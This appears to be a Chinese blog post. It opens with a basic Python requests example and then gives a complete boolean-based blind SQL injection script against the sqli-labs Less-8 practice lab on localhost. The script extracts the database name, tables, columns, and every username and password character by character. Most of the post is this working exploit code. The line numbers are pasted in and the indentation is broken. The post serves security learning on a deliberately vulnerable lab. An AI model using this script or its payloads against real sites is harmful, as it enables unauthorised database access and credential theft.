# coding = utf-8
import requests
url = 'http://www.baidu.com'
ret = requests.get(url)
print(type(ret)) # 返回类型 <class 'requests.models.Response'>
print(ret) # 返回值:<Response [200]>
print(ret.text) # 输出文本信息
print(ret.content) # 以二进制输出
1 # coding:utf-8
2 import requests
3
4 # 获取数据库名长度
5 def database_len():
6 for i in range(1, 10):
7 url = '''http://127.0.0.1/sqli-labs/Less-8/index.php'''
8 payload = '''?id=1' and length(database())>%s''' % i
9 # print(url+payload+'%23')
10 r = requests.get(url + payload + '%23')
11 if 'You are in' in r.text:
12 print(i)
13
14 else:
15 # print('false')
16 print('database_length:', i)
17 break
18
19
20 database_len()
21
22 #获取数据库名
23 def database_name():
24 name = ''
25 for j in range(1, 9):
26 for i in '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':
27 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" % (
28 j, i)
29 # print(url+'%23')
30 r = requests.get(url + '%23')
31 if 'You are in' in r.text:
32 name = name + i
33
34 print(name)
35
36 break
37 print('database_name:', name)
38
39
40 database_name()
41
42 # 获取数据库表
43 def tables_name():
44 name = ''
45 for j in range(1, 30):
46 for i in 'abcdefghijklmnopqrstuvwxyz,':
47 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'" % (
48 j, i)
49 r = requests.get(url + '%23')
50 if 'You are in' in r.text:
51 name = name + i
52
53 print(name)
54
55 break
56 print('table_name:', name)
57
58
59 tables_name()
60
61
62 # 获取表中字段
63 def columns_name():
64 name = ''
65 for j in range(1, 30):
66 for i in 'abcdefghijklmnopqrstuvwxyz,':
67 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),%d,1)='%s'" % (
68 j, i)
69 r = requests.get(url + '%23')
70 if 'You are in' in r.text:
71 name = name + i
72
73 print(name)
74
75 break
76 print('column_name:', name)
77
78
79 columns_name()
80
81
82 # 获取username
83 def username_value():
84 name = ''
85 for j in range(1, 100):
86 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
87 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(username) from users),%d,1)='%s'" % (
88 j, i)
89 r = requests.get(url + '%23')
90 if 'You are in' in r.text:
91 name = name + i
92
93 print(name)
94
95 break
96 print('username_value:', name)
97
98
99 username_value()
100
101
102 # 获取password
103 def password_value():
104 name = ''
105 for j in range(1, 100):
106 for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
107 url = "http://127.0.0.1/sqli-labs/Less-8/index.php?id=1' and substr((select group_concat(password) from users),%d,1)='%s'" % (
108 j, i)
109 r = requests.get(url + '%23')
110 if 'You are in' in r.text:
111 name = name + i
112
113 print(name)
114
115 break
116 print('password_value:', name)
117
118
119 password_value()
浙公网安备 33010602011771号